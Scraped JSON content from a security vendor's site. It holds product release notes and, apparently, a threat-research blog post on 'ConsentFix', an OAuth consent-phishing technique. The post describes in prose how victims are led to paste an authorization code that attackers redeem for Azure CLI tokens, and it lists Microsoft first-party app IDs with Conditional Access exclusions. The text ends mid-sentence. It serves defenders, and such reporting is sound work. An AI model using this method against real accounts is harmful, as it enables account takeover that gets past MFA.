",{"data":19228,"marks":19229,"value":19231,"nodeType":173},{},[19230],{"type":370},"Detections",{"data":19233,"marks":19234,"value":19235,"nodeType":173},{},[]," page of the Push admin console. You can also configure the control to warn or block users automatically.",{"data":19237,"content":19238,"nodeType":178},{},[19239,19243,19247],{"data":19240,"marks":19241,"value":19242,"nodeType":173},{},[],"To enable malicious extension detection, go to the ",{"data":19244,"marks":19245,"value":18649,"nodeType":173},{},[19246],{"type":370},{"data":19248,"marks":19249,"value":19250,"nodeType":173},{},[]," page in the Push admin console. ",{"data":19252,"content":19256,"nodeType":312},{"target":19253},{"sys":19254},{"id":19255,"type":317,"linkType":318},"1QV5UQ04MYLpWY7jTocvO4",[],{"data":19258,"content":19259,"nodeType":178},{},[19260,19263,19271],{"data":19261,"marks":19262,"value":37,"nodeType":173},{},[],{"data":19264,"content":19267,"nodeType":1698},{"target":19265},{"sys":19266},{"id":2194,"type":317,"linkType":318},[19268],{"data":19269,"marks":19270,"value":18605,"nodeType":173},{},[],{"data":19272,"marks":19273,"value":37,"nodeType":173},{},[],{"data":19275,"content":19276,"nodeType":169},{},[19277],{"data":19278,"marks":19279,"value":19166,"nodeType":173},{},[],{"data":19281,"content":19282,"nodeType":178},{},[19283,19287,19291],{"data":19284,"marks":19285,"value":19286,"nodeType":173},{},[],"You can also block unwanted extensions or allowlist only the extensions you want in your environment, using Push’s ",{"data":19288,"marks":19289,"value":2615,"nodeType":173},{},[19290],{"type":370},{"data":19292,"marks":19293,"value":19294,"nodeType":173},{},[]," control.",{"data":19296,"content":19297,"nodeType":178},{},[19298],{"data":19299,"marks":19300,"value":19301,"nodeType":173},{},[],"End-users will see a block page if they attempt to enable a blocked extension or install one via the Chrome or Microsoft extension stores.",{"data":19303,"content":19307,"nodeType":312},{"target":19304},{"sys":19305},{"id":19306,"type":317,"linkType":318},"3OCdGfsyNTLXQx77dwzY9L",[],{"data":19309,"content":19310,"nodeType":178},{},[19311,19314,19322],{"data":19312,"marks":19313,"value":37,"nodeType":173},{},[],{"data":19315,"content":19318,"nodeType":1698},{"target":19316},{"sys":19317},{"id":2489,"type":317,"linkType":318},[19319],{"data":19320,"marks":19321,"value":18605,"nodeType":173},{},[],{"data":19323,"marks":19324,"value":37,"nodeType":173},{},[],{"data":19326,"content":19327,"nodeType":169},{},[19328],{"data":19329,"marks":19330,"value":19176,"nodeType":173},{},[],{"data":19332,"content":19333,"nodeType":178},{},[19334,19338,19347],{"data":19335,"marks":19336,"value":19337,"nodeType":173},{},[],"You can now block ClickFix-style malicious copy and paste attacks using Push. These are one of the ",{"data":19339,"content":19342,"nodeType":1698},{"target":19340},{"sys":19341},{"id":18678,"type":317,"linkType":318},[19343],{"data":19344,"marks":19345,"value":19346,"nodeType":173},{},[],"fastest-growing",{"data":19348,"marks":19349,"value":19350,"nodeType":173},{},[]," browser-based attacks. You can also choose to collect the payload for your security team to investigate.",{"data":19352,"content":19353,"nodeType":178},{},[19354,19358,19363,19367,19372,19375,19380],{"data":19355,"marks":19356,"value":19357,"nodeType":173},{},[],"From the Push admin console, go to ",{"data":19359,"marks":19360,"value":19362,"nodeType":173},{},[19361],{"type":370},"Controls > Malicious copy and paste detection",{"data":19364,"marks":19365,"value":19366,"nodeType":173},{},[],". Then create a configuration rule to select the ",{"data":19368,"marks":19369,"value":19371,"nodeType":173},{},[19370],{"type":370},"Mode",{"data":19373,"marks":19374,"value":933,"nodeType":173},{},[],{"data":19376,"marks":19377,"value":19379,"nodeType":173},{},[19378],{"type":370},"Scope",{"data":19381,"marks":19382,"value":19383,"nodeType":173},{},[],". If you’ve enabled payload collection, Push will collect the malicious payload and include it in the detection event.",{"data":19385,"content":19386,"nodeType":178},{},[19387,19390,19398],{"data":19388,"marks":19389,"value":37,"nodeType":173},{},[],{"data":19391,"content":19394,"nodeType":1698},{"target":19392},{"sys":19393},{"id":2215,"type":317,"linkType":318},[19395],{"data":19396,"marks":19397,"value":18605,"nodeType":173},{},[],{"data":19399,"marks":19400,"value":37,"nodeType":173},{},[],{"data":19402,"content":19403,"nodeType":169},{},[19404],{"data":19405,"marks":19406,"value":19186,"nodeType":173},{},[],{"data":19408,"content":19409,"nodeType":178},{},[19410],{"data":19411,"marks":19412,"value":19413,"nodeType":173},{},[],"Customize the look and feel of employee-facing banners and warn or block pages by adding your company logo, accent color, and choice of light or dark mode themes. ",{"data":19415,"content":19416,"nodeType":178},{},[19417,19421,19426],{"data":19418,"marks":19419,"value":19420,"nodeType":173},{},[],"To add your brand elements, go to ",{"data":19422,"marks":19423,"value":19425,"nodeType":173},{},[19424],{"type":370},"Settings > Branding",{"data":19427,"marks":19428,"value":1477,"nodeType":173},{},[],{"data":19430,"content":19434,"nodeType":312},{"target":19431},{"sys":19432},{"id":19433,"type":317,"linkType":318},"3Jawd7IBSA3GF2XBHARsn",[],{"data":19436,"content":19437,"nodeType":178},{},[19438,19441,19450],{"data":19439,"marks":19440,"value":37,"nodeType":173},{},[],{"data":19442,"content":19446,"nodeType":1698},{"target":19443},{"sys":19444},{"id":19445,"type":317,"linkType":318},"4i1KWgBfYqtFYlUFRYiGdW",[19447],{"data":19448,"marks":19449,"value":18605,"nodeType":173},{},[],{"data":19451,"marks":19452,"value":37,"nodeType":173},{},[],{"data":19454,"content":19455,"nodeType":169},{},[19456],{"data":19457,"marks":19458,"value":19196,"nodeType":173},{},[],{"data":19460,"content":19461,"nodeType":178},{},[19462],{"data":19463,"marks":19464,"value":19465,"nodeType":173},{},[],"The Push browser extension can now collect additional metadata and store it locally for up to 30 days, powering more diverse and precise detections, including for emerging threats. ",{"data":19467,"content":19468,"nodeType":178},{},[19469,19473,19477,19481,19485],{"data":19470,"marks":19471,"value":19472,"nodeType":173},{},[],"Detections informed by this metadata will be raised on the ",{"data":19474,"marks":19475,"value":19231,"nodeType":173},{},[19476],{"type":370},{"data":19478,"marks":19479,"value":19480,"nodeType":173},{},[]," page. Note that these detections do not block end-user activity and are ",{"data":19482,"marks":19483,"value":2701,"nodeType":173},{},[19484],{"type":370},{"data":19486,"marks":19487,"value":19488,"nodeType":173},{},[]," mode only.",{"data":19490,"content":19491,"nodeType":178},{},[19492,19496,19501,19505,19510],{"data":19493,"marks":19494,"value":19495,"nodeType":173},{},[],"We recommend you enable ",{"data":19497,"marks":19498,"value":19500,"nodeType":173},{},[19499],{"type":370},"Browser event storage",{"data":19502,"marks":19503,"value":19504,"nodeType":173},{},[]," to take advantage of this capability. Go to ",{"data":19506,"marks":19507,"value":19509,"nodeType":173},{},[19508],{"type":370},"Settings > Telemetry > Browser event storage",{"data":19511,"marks":19512,"value":18738,"nodeType":173},{},[],{"data":19514,"content":19515,"nodeType":178},{},[19516,19519,19528],{"data":19517,"marks":19518,"value":37,"nodeType":173},{},[],{"data":19520,"content":19524,"nodeType":1698},{"target":19521},{"sys":19522},{"id":19523,"type":317,"linkType":318},"1x69JxXcDWEDIzYXUM8nGb",[19525],{"data":19526,"marks":19527,"value":18605,"nodeType":173},{},[],{"data":19529,"marks":19530,"value":37,"nodeType":173},{},[],{"data":19532,"content":19533,"nodeType":169},{},[19534],{"data":19535,"marks":19536,"value":19537,"nodeType":173},{},[],"And a few other things ...",{"data":19539,"content":19540,"nodeType":178},{},[19541],{"data":19542,"marks":19543,"value":19003,"nodeType":173},{},[],{"data":19545,"content":19546,"nodeType":250},{},[19547,19567,19577,19597],{"data":19548,"content":19549,"nodeType":254},{},[19550],{"data":19551,"content":19552,"nodeType":178},{},[19553,19557,19564],{"data":19554,"marks":19555,"value":19556,"nodeType":173},{},[],"You can now configure the frequency with which app banners will be displayed: either per-tab or per-browser. ",{"data":19558,"content":19560,"nodeType":186},{"uri":19559},"/help/10125#frequency",[19561],{"data":19562,"marks":19563,"value":18605,"nodeType":173},{},[],{"data":19565,"marks":19566,"value":37,"nodeType":173},{},[],{"data":19568,"content":19569,"nodeType":254},{},[19570],{"data":19571,"content":19572,"nodeType":178},{},[19573],{"data":19574,"marks":19575,"value":19576,"nodeType":173},{},[],"You can now define an Owner role as part of Push’s RBAC options. Only Owners can edit roles, delete your team (e.g. tenant), change default SAML roles, or update your team name.",{"data":19578,"content":19579,"nodeType":254},{},[19580],{"data":19581,"content":19582,"nodeType":178},{},[19583,19587,19594],{"data":19584,"marks":19585,"value":19586,"nodeType":173},{},[],"Webhook events now include detection details, for greater context. ",{"data":19588,"content":19590,"nodeType":186},{"uri":19589},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/detections",[19591],{"data":19592,"marks":19593,"value":18605,"nodeType":173},{},[],{"data":19595,"marks":19596,"value":37,"nodeType":173},{},[],{"data":19598,"content":19599,"nodeType":254},{},[19600],{"data":19601,"content":19602,"nodeType":178},{},[19603,19607,19614],{"data":19604,"marks":19605,"value":19606,"nodeType":173},{},[],"Push now uses static IP addresses to emit webhook events. These IP addresses are in the same range we previously used, but if you wish to update your network filtering to these new, narrower IP addresses, you can. ",{"data":19608,"content":19610,"nodeType":186},{"uri":19609},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/section/ip-addresses",[19611],{"data":19612,"marks":19613,"value":18605,"nodeType":173},{},[],{"data":19615,"marks":19616,"value":37,"nodeType":173},{},[],{"data":19618,"content":19619,"nodeType":178},{},[19620],{"data":19621,"marks":19622,"value":37,"nodeType":173},{},[],{"entries":19624},{"inline":19625,"hyperlink":19626,"block":19647},[],[19627,19629,19631,19635,19637,19642],{"sys":19628,"__typename":6655,"title":6666,"slug":6667,"articleId":6668},{"id":2194},{"sys":19630,"__typename":6655,"title":6696,"slug":6697,"articleId":6698},{"id":2489},{"sys":19632,"__typename":1528,"title":19633,"slug":19634},{"id":18678},"Introducing malicious copy and paste detection","introducing-malicious-copy-paste-detection",{"sys":19636,"__typename":6655,"title":6671,"slug":6672,"articleId":6673},{"id":2215},{"sys":19638,"__typename":6655,"title":19639,"slug":19640,"articleId":19641},{"id":19445},"How do I add custom branding to Push banners and block pages?","how-do-i-add-custom-branding-to-push-banners-and-block-pages",10147,{"sys":19643,"__typename":6655,"title":19644,"slug":19645,"articleId":19646},{"id":19523},"How do I configure browser event storage?","how-do-i-configure-browser-event-storage",10146,[19648,19655,19662],{"sys":19649,"__typename":5345,"title":19650,"caption":118,"layoutMode":118,"file":19651},{"id":19255},"Malicious extension detection - Controls page - for release notes",{"url":19652,"width":19653,"height":19654},"https://images.ctfassets.net/y1cdw1ablpvd/2OhoXumfBK0saT2oLeCPrI/95950149e4c7f11c53948ba0cf0b09b5/malicious_ext_det_controls_pg.png",1337,767,{"sys":19656,"__typename":5345,"title":19657,"caption":118,"layoutMode":118,"file":19658},{"id":19306},"Browser extension block screen - KB 10138",{"url":19659,"width":19660,"height":19661},"https://images.ctfassets.net/y1cdw1ablpvd/3i6Sj2jgOimCqGtpKy1B7p/3c78161975dbc1cab3d5d2c454206111/extension_block_page_dark_theme.png",1270,717,{"sys":19663,"__typename":5345,"title":19664,"caption":19665,"layoutMode":118,"file":19666},{"id":19433},"Branded banner example - dark style - KB 10147","Example of a dark style mid-screen banner",{"url":19667,"width":19668,"height":19669},"https://images.ctfassets.net/y1cdw1ablpvd/F8v8jKH2SXlMeHbG83Nvh/2b7c51c8bbb2ad74947f4a2bcee3048b/midscreen_dark_banner.png",2944,562,"content:blog:product-release-march-2026.json","blog/product-release-march-2026.json","blog/product-release-march-2026",{"_path":19674,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":19675,"ogImage":118,"summary":19677,"title":13964,"subtitle":118,"metaTitle":19688,"synopsis":13965,"hashTags":118,"publishedDate":13966,"slug":13967,"tagsCollection":19689,"relatedBlogPostsCollection":19695,"authorsCollection":21736,"content":21740,"_id":22831,"_type":5439,"_source":5440,"_file":22832,"_stem":22833,"_extension":5439},"/blog/installfix",{"id":12962,"publishedAt":19676},"2026-03-16T11:36:37.630Z",{"json":19678},{"data":19679,"content":19680,"nodeType":165},{},[19681],{"data":19682,"content":19683,"nodeType":178},{},[19684],{"data":19685,"marks":19686,"value":19687,"nodeType":173},{},[],"Attackers are distributing almost identical cloned sites of popular developer tools like Claude Code with fake install instructions via malicious search engine ads — tricking victims into installing infostealer malware instead. ","InstallFix: Weaponizing malvertised install guides  ",{"items":19690},[19691,19693],{"sys":19692,"name":505},{"id":504},{"sys":19694,"name":509},{"id":508},{"items":19696},[19697,20514,21104],{"__typename":1528,"sys":19698,"content":19700,"title":20500,"synopsis":20501,"hashTags":118,"publishedDate":20502,"slug":20503,"tagsCollection":20504,"authorsCollection":20510},{"id":19699},"4jcVFrvGBtVXpKU3gDMaa2",{"json":19701},{"nodeType":165,"data":19702,"content":19703},{},[19704,19722,19729,19735,19790,19797,19804,19807,19815,19822,19829,19880,19888,19895,19918,19925,19928,19936,19943,19950,19957,19964,19971,19978,19983,19991,19998,20017,20037,20040,20048,20055,20062,20069,20077,20096,20103,20109,20117,20137,20157,20270,20273,20281,20288,20295,20298,20306,20313,20320,20327,20394,20424,20427,20435,20441,20448,20455,20462,20488,20494],{"nodeType":178,"data":19705,"content":19706},{},[19707,19711,19718],{"nodeType":173,"value":19708,"marks":19709,"data":19710},"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ",[],{},{"nodeType":186,"data":19712,"content":19713},{"uri":1854},[19714],{"nodeType":173,"value":1857,"marks":19715,"data":19717},[19716],{"type":194},{},{"nodeType":173,"value":19719,"marks":19720,"data":19721},". This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. ",[],{},{"nodeType":178,"data":19723,"content":19724},{},[19725],{"nodeType":173,"value":19726,"marks":19727,"data":19728},"We saw this attack running across a large network of compromised websites that attackers were injecting the malicious payload into, forming a large-scale campaign that was detected across multiple customer estates. ",[],{},{"nodeType":312,"data":19730,"content":19734},{"target":19731},{"sys":19732},{"id":19733,"type":317,"linkType":318},"603MWDqc9NsqkklIkfGNZN",[],{"nodeType":178,"data":19736,"content":19737},{},[19738,19742,19751,19755,19763,19766,19775,19778,19786],{"nodeType":173,"value":19739,"marks":19740,"data":19741},"ConsentFix got a pretty awesome response from the community in a very short space of time. Within days, ",[],{},{"nodeType":186,"data":19743,"content":19745},{"uri":19744},"https://www.youtube.com/watch?v=AAiiIY-Soak",[19746],{"nodeType":173,"value":19747,"marks":19748,"data":19750},"John Hammond shared a new and improved version of the technique",[19749],{"type":194},{},{"nodeType":173,"value":19752,"marks":19753,"data":19754}," that he’d spun up in his own lab, while security researchers from ",[],{},{"nodeType":186,"data":19756,"content":19758},{"uri":19757},"https://medium.com/@nitashathakur/consentfix-poc-how-the-attack-works-end-to-end-4f8b656f977d",[19759],{"nodeType":173,"value":1255,"marks":19760,"data":19762},[19761],{"type":194},{},{"nodeType":173,"value":2936,"marks":19764,"data":19765},[],{},{"nodeType":186,"data":19767,"content":19769},{"uri":19768},"https://www.glueckkanja.com/en/posts/2025-12-31-vulnerability-consentfix",[19770],{"nodeType":173,"value":19771,"marks":19772,"data":19774},"Glueck Kanja",[19773],{"type":194},{},{"nodeType":173,"value":9534,"marks":19776,"data":19777},[],{},{"nodeType":186,"data":19779,"content":19780},{"uri":12080},[19781],{"nodeType":173,"value":19782,"marks":19783,"data":19785},"other individual contributors",[19784],{"type":194},{},{"nodeType":173,"value":19787,"marks":19788,"data":19789}," all shared analysis and recommendations. ",[],{},{"nodeType":178,"data":19791,"content":19792},{},[19793],{"nodeType":173,"value":19794,"marks":19795,"data":19796},"In this blog, we’re sharing some new insights on the campaign, pulling together some of the top recommendations and resources shared across the community, and predicting what the future holds for this novel technique as it quickly enters the mainstream. ",[],{},{"nodeType":178,"data":19798,"content":19799},{},[19800],{"nodeType":173,"value":19801,"marks":19802,"data":19803},"First though, let’s quickly recap what ConsentFix is and how it works. ",[],{},{"nodeType":231,"data":19805,"content":19806},{},[],{"nodeType":169,"data":19808,"content":19809},{},[19810],{"nodeType":173,"value":19811,"marks":19812,"data":19814},"ConsentFix 101",[19813],{"type":370},{},{"nodeType":178,"data":19816,"content":19817},{},[19818],{"nodeType":173,"value":19819,"marks":19820,"data":19821},"ConsentFix is an attack technique that prompts the victim to share an OAuth authorization code with an attacker via a phishing page. The attacker then enters this code into a target application on their own device in order to complete the authorization handshake and take over the account. ",[],{},{"nodeType":178,"data":19823,"content":19824},{},[19825],{"nodeType":173,"value":19826,"marks":19827,"data":19828},"By hijacking OAuth, attackers can effectively bypass identity-layer controls like passwords and MFA — even phishing resistant authentication methods like passkeys have no impact on this attack, because it sidesteps the authentication process altogether. ",[],{},{"nodeType":178,"data":19830,"content":19831},{},[19832,19836,19844,19847,19854,19858,19865,19869,19877],{"nodeType":173,"value":19833,"marks":19834,"data":19835},"OAuth abuse attacks are not new. Techniques like ",[],{},{"nodeType":186,"data":19837,"content":19839},{"uri":19838},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/consent_phishing/description.md",[19840],{"nodeType":173,"value":8091,"marks":19841,"data":19843},[19842],{"type":194},{},{"nodeType":173,"value":933,"marks":19845,"data":19846},[],{},{"nodeType":186,"data":19848,"content":19849},{"uri":9275},[19850],{"nodeType":173,"value":1812,"marks":19851,"data":19853},[19852],{"type":194},{},{"nodeType":173,"value":19855,"marks":19856,"data":19857}," have been around for some time. However, these mainly focus on connecting your primary workspace account (e.g. Microsoft, Google, etc.) to a fraudulent, attacker-controlled application. But this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":186,"data":19859,"content":19860},{"uri":8112},[19861],{"nodeType":173,"value":8115,"marks":19862,"data":19864},[19863],{"type":194},{},{"nodeType":173,"value":19866,"marks":19867,"data":19868},". That said, device code phishing still featured prominently in the recent ",[],{},{"nodeType":186,"data":19870,"content":19871},{"uri":5002},[19872],{"nodeType":173,"value":19873,"marks":19874,"data":19876},"high-profile Salesforce attacks in 2025",[19875],{"type":194},{},{"nodeType":173,"value":1477,"marks":19878,"data":19879},[],{},{"nodeType":235,"data":19881,"content":19882},{},[19883],{"nodeType":173,"value":19884,"marks":19885,"data":19887},"What makes ConsentFix so dangerous?",[19886],{"type":370},{},{"nodeType":178,"data":19889,"content":19890},{},[19891],{"nodeType":173,"value":19892,"marks":19893,"data":19894},"Unlike typical OAuth attacks, the novel ConsentFix approach enabled the attacker to target different types of application to what they usually go after — with big implications for detection and response. In this case, the attacker:",[],{},{"nodeType":250,"data":19896,"content":19897},{},[19898,19908],{"nodeType":254,"data":19899,"content":19900},{},[19901],{"nodeType":178,"data":19902,"content":19903},{},[19904],{"nodeType":173,"value":19905,"marks":19906,"data":19907},"Specifically targeted first-party Microsoft apps that cannot be restricted in the same way as third-party applications, and are pre-consented in every tenant (meaning users can authenticate to them without admin approval). ",[],{},{"nodeType":254,"data":19909,"content":19910},{},[19911],{"nodeType":178,"data":19912,"content":19913},{},[19914],{"nodeType":173,"value":19915,"marks":19916,"data":19917},"Leveraged legacy scopes that are outside the scope of default logging to evade detection, and targeted scopes with known Conditional Access policy exclusions.",[],{},{"nodeType":178,"data":19919,"content":19920},{},[19921],{"nodeType":173,"value":19922,"marks":19923,"data":19924},"This means that default controls you’d expect to block malicious OAuth grants don’t apply, you may not have logging enabled to detect it if it did happen to you, and to top it off, conditional access policy exclusions mean that many organizations’ expected controls don’t work as intended in this case. ",[],{},{"nodeType":231,"data":19926,"content":19927},{},[],{"nodeType":169,"data":19929,"content":19930},{},[19931],{"nodeType":173,"value":19932,"marks":19933,"data":19935},"ConsentFix campaign recap",[19934],{"type":370},{},{"nodeType":178,"data":19937,"content":19938},{},[19939],{"nodeType":173,"value":19940,"marks":19941,"data":19942},"Let’s quickly recap how the ConsentFix campaign was implemented. ",[],{},{"nodeType":178,"data":19944,"content":19945},{},[19946],{"nodeType":173,"value":19947,"marks":19948,"data":19949},"The victim is served a page which requires that they verify that they are human by pasting a URL into the phishing page.",[],{},{"nodeType":178,"data":19951,"content":19952},{},[19953],{"nodeType":173,"value":19954,"marks":19955,"data":19956},"Clicking the “Sign In” button opens a legitimate Microsoft login page. If the user is already logged in (which they likely are if working in their normal browser) their account information is already pre-populated and they won’t need to authenticate again. ",[],{},{"nodeType":178,"data":19958,"content":19959},{},[19960],{"nodeType":173,"value":19961,"marks":19962,"data":19963},"Selecting their account redirects them to a localhost URL containing an OAuth authorization code — this is what they then post into the original phishing page to complete the attack. ",[],{},{"nodeType":178,"data":19965,"content":19966},{},[19967],{"nodeType":173,"value":19968,"marks":19969,"data":19970},"Once the attacker gets the URL, they can exchange it for an access token or refresh token for the particular application being targeted — in this case, Azure CLI.",[],{},{"nodeType":178,"data":19972,"content":19973},{},[19974],{"nodeType":173,"value":19975,"marks":19976,"data":19977},"The TL;DR is that the attacker is manually completing an authorization flow that happens when a user logs into Azure CLI — a a command line client that provides you with the ability to easily manage your Azure AD / Entra ID environment. Except in this case, they’re taking the victim’s information to log in on the attacker’s device instead. ",[],{},{"nodeType":312,"data":19979,"content":19982},{"target":19980},{"sys":19981},{"id":7950,"type":317,"linkType":318},[],{"nodeType":235,"data":19984,"content":19985},{},[19986],{"nodeType":173,"value":19987,"marks":19988,"data":19990},"Latest campaign details",[19989],{"type":370},{},{"nodeType":178,"data":19992,"content":19993},{},[19994],{"nodeType":173,"value":19995,"marks":19996,"data":19997},"Since we shared our blog post, we’ve had a number of additional details come to light about the campaign, which we’ve continued to track. ",[],{},{"nodeType":178,"data":19999,"content":20000},{},[20001,20005,20013],{"nodeType":173,"value":20002,"marks":20003,"data":20004},"It appears to be linked to Russian state-affiliated APT29, as corroborated by threat researchers we’ve been collaborating with. This is consistent with the ",[],{},{"nodeType":186,"data":20006,"content":20007},{"uri":1854},[20008],{"nodeType":173,"value":20009,"marks":20010,"data":20012},"stealthy tactics we observed",[20011],{"type":194},{},{"nodeType":173,"value":20014,"marks":20015,"data":20016},", which go far beyond the run-of-the-mill detection evasion techniques we see used in criminal phishing campaigns. ",[],{},{"nodeType":178,"data":20018,"content":20019},{},[20020,20024,20033],{"nodeType":173,"value":20021,"marks":20022,"data":20023},"It shares many similarities with, and appears to be an evolution of, ",[],{},{"nodeType":186,"data":20025,"content":20027},{"uri":20026},"https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/",[20028],{"nodeType":173,"value":20029,"marks":20030,"data":20032},"this Russia-affiliated campaign identified by Volexity",[20031],{"type":194},{},{"nodeType":173,"value":20034,"marks":20035,"data":20036}," that featured a manual version of the attack — where they victim was social engineered via email into opening the Microsoft URL, copying the localhost response, and sending it back to the attacker via email. ",[],{},{"nodeType":231,"data":20038,"content":20039},{},[],{"nodeType":169,"data":20041,"content":20042},{},[20043],{"nodeType":173,"value":20044,"marks":20045,"data":20047},"Top contributions from the community",[20046],{"type":370},{},{"nodeType":178,"data":20049,"content":20050},{},[20051],{"nodeType":173,"value":20052,"marks":20053,"data":20054},"As we mentioned earlier, the community response to ConsentFix has been incredible. ",[],{},{"nodeType":178,"data":20056,"content":20057},{},[20058],{"nodeType":173,"value":20059,"marks":20060,"data":20061},"As ever, you get a lot of vendors covering the attack technique with “install our product” as the recommendation. This is to be expected, but it’s misleading when some of these vendors are pushing EDR products that would have absolutely no way of detecting or blocking the attack. ",[],{},{"nodeType":178,"data":20063,"content":20064},{},[20065],{"nodeType":173,"value":20066,"marks":20067,"data":20068},"But cutting through the marketing, a lot of really great resources and recommendations were shared. ",[],{},{"nodeType":235,"data":20070,"content":20071},{},[20072],{"nodeType":173,"value":20073,"marks":20074,"data":20076},"V2.0 released by John Hammond",[20075],{"type":370},{},{"nodeType":178,"data":20078,"content":20079},{},[20080,20084,20092],{"nodeType":173,"value":20081,"marks":20082,"data":20083},"Within days, John Hammond ",[],{},{"nodeType":186,"data":20085,"content":20086},{"uri":19744},[20087],{"nodeType":173,"value":20088,"marks":20089,"data":20091},"posted about ConsentFix on his Youtube channel",[20090],{"type":194},{},{"nodeType":173,"value":20093,"marks":20094,"data":20095},", where he showed off a slick improvement on the ConsentFix implementation used by attackers. In his version, the URL containing the Microsoft authorization code was generated in a pop-up browser window that could simply be drag-and-dropped into the phishing page. ",[],{},{"nodeType":178,"data":20097,"content":20098},{},[20099],{"nodeType":173,"value":20100,"marks":20101,"data":20102},"This implementation is way smoother, making it much more likely that a victim would fall for it. And this took a matter of days… ",[],{},{"nodeType":312,"data":20104,"content":20108},{"target":20105},{"sys":20106},{"id":20107,"type":317,"linkType":318},"59tfJDRhGThKD48Wjg7uY2",[],{"nodeType":235,"data":20110,"content":20111},{},[20112],{"nodeType":173,"value":20113,"marks":20114,"data":20116},"Additional vulnerable first-party apps identified",[20115],{"type":370},{},{"nodeType":178,"data":20118,"content":20119},{},[20120,20124,20133],{"nodeType":173,"value":20121,"marks":20122,"data":20123},"Fabian Bader and Dirk-jan Mollema from Glueck Kanja have ",[],{},{"nodeType":186,"data":20125,"content":20127},{"uri":20126},"https://entrascopes.com/?bypass=true&authcodeFix=true",[20128],{"nodeType":173,"value":20129,"marks":20130,"data":20132},"shared a great resource",[20131],{"type":194},{},{"nodeType":173,"value":20134,"marks":20135,"data":20136}," on wider first-party apps that are vulnerable to ConsentFix. ",[],{},{"nodeType":178,"data":20138,"content":20139},{},[20140,20144,20153],{"nodeType":173,"value":20141,"marks":20142,"data":20143},"In total, there are 11 apps vulnerable to ConsentFix that also have known ",[],{},{"nodeType":186,"data":20145,"content":20147},{"uri":20146},"https://cloudbrothers.info/conditional-access-bypasses/#documented-bypasses",[20148],{"nodeType":173,"value":20149,"marks":20150,"data":20152},"Conditional Access exclusions",[20151],{"type":194},{},{"nodeType":173,"value":20154,"marks":20155,"data":20156}," (either for the app generally, or when specific scopes are requested for the app):",[],{},{"nodeType":250,"data":20158,"content":20159},{},[20160,20170,20180,20190,20200,20210,20220,20230,20240,20250,20260],{"nodeType":254,"data":20161,"content":20162},{},[20163],{"nodeType":178,"data":20164,"content":20165},{},[20166],{"nodeType":173,"value":20167,"marks":20168,"data":20169},"Microsoft Azure CLI: 04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":254,"data":20171,"content":20172},{},[20173],{"nodeType":178,"data":20174,"content":20175},{},[20176],{"nodeType":173,"value":20177,"marks":20178,"data":20179},"Microsoft Azure PowerShell: 1950a258-227b-4e31-a9cf-717495945fc2",[],{},{"nodeType":254,"data":20181,"content":20182},{},[20183],{"nodeType":178,"data":20184,"content":20185},{},[20186],{"nodeType":173,"value":20187,"marks":20188,"data":20189},"Microsoft Teams: 1fec8e78-bce4-4aaf-ab1b-5451cc387264",[],{},{"nodeType":254,"data":20191,"content":20192},{},[20193],{"nodeType":178,"data":20194,"content":20195},{},[20196],{"nodeType":173,"value":20197,"marks":20198,"data":20199},"Microsoft Whiteboard Client: 57336123-6e14-4acc-8dcf-287b6088aa28",[],{},{"nodeType":254,"data":20201,"content":20202},{},[20203],{"nodeType":178,"data":20204,"content":20205},{},[20206],{"nodeType":173,"value":20207,"marks":20208,"data":20209},"Microsoft Flow Mobile PROD-GCCH-CN: 57fcbcfa-7cee-4eb1-8b25-12d2030b4ee0",[],{},{"nodeType":254,"data":20211,"content":20212},{},[20213],{"nodeType":178,"data":20214,"content":20215},{},[20216],{"nodeType":173,"value":20217,"marks":20218,"data":20219},"Enterprise Roaming and Backup: 60c8bde5-3167-4f92-8fdb-059f6176dc0",[],{},{"nodeType":254,"data":20221,"content":20222},{},[20223],{"nodeType":178,"data":20224,"content":20225},{},[20226],{"nodeType":173,"value":20227,"marks":20228,"data":20229},"Visual Studio: 872cd9fa-d31f-45e0-9eab-6e460a02d1f1",[],{},{"nodeType":254,"data":20231,"content":20232},{},[20233],{"nodeType":178,"data":20234,"content":20235},{},[20236],{"nodeType":173,"value":20237,"marks":20238,"data":20239},"Aadrm Admin Powershell: 90f610bf-206d-4950-b61d-37fa6fd1b224",[],{},{"nodeType":254,"data":20241,"content":20242},{},[20243],{"nodeType":178,"data":20244,"content":20245},{},[20246],{"nodeType":173,"value":20247,"marks":20248,"data":20249},"Microsoft SharePoint Online Management Shell: 9bc3ab49-b65d-410a-85ad-de819febfddc",[],{},{"nodeType":254,"data":20251,"content":20252},{},[20253],{"nodeType":178,"data":20254,"content":20255},{},[20256],{"nodeType":173,"value":20257,"marks":20258,"data":20259},"Microsoft Power Query for Excel: a672d62c-fc7b-4e81-a576-e60dc46e951d",[],{},{"nodeType":254,"data":20261,"content":20262},{},[20263],{"nodeType":178,"data":20264,"content":20265},{},[20266],{"nodeType":173,"value":20267,"marks":20268,"data":20269},"Visual Studio Code: aebc6443-996d-45c2-90f0-388ff96faa56",[],{},{"nodeType":231,"data":20271,"content":20272},{},[],{"nodeType":169,"data":20274,"content":20275},{},[20276],{"nodeType":173,"value":20277,"marks":20278,"data":20280},"Predictions for ConsentFix",[20279],{"type":370},{},{"nodeType":178,"data":20282,"content":20283},{},[20284],{"nodeType":173,"value":20285,"marks":20286,"data":20287},"Based on the speed at which new iterations on the ConsentFix technique were shared by security researchers, and the breadth of apps and possible scopes that can be leveraged, both red teams and criminals will inevitably adopt ConsentFix into their arsenal of TTPs in the near future. It is likely that new ConsentFix variants will emerge imminently (if not already in circulation). ",[],{},{"nodeType":178,"data":20289,"content":20290},{},[20291],{"nodeType":173,"value":20292,"marks":20293,"data":20294},"All security teams responsible for protecting Microsoft environments should ensure that monitoring controls and mitigations are put in place as a matter of high priority. ",[],{},{"nodeType":231,"data":20296,"content":20297},{},[],{"nodeType":169,"data":20299,"content":20300},{},[20301],{"nodeType":173,"value":20302,"marks":20303,"data":20305},"Updated recommendations for security teams",[20304],{"type":370},{},{"nodeType":178,"data":20307,"content":20308},{},[20309],{"nodeType":173,"value":20310,"marks":20311,"data":20312},"As an entirely browser-native attack technique, many traditional security tools and data sources are of limited use when it comes to detecting or pre-emptively blocking 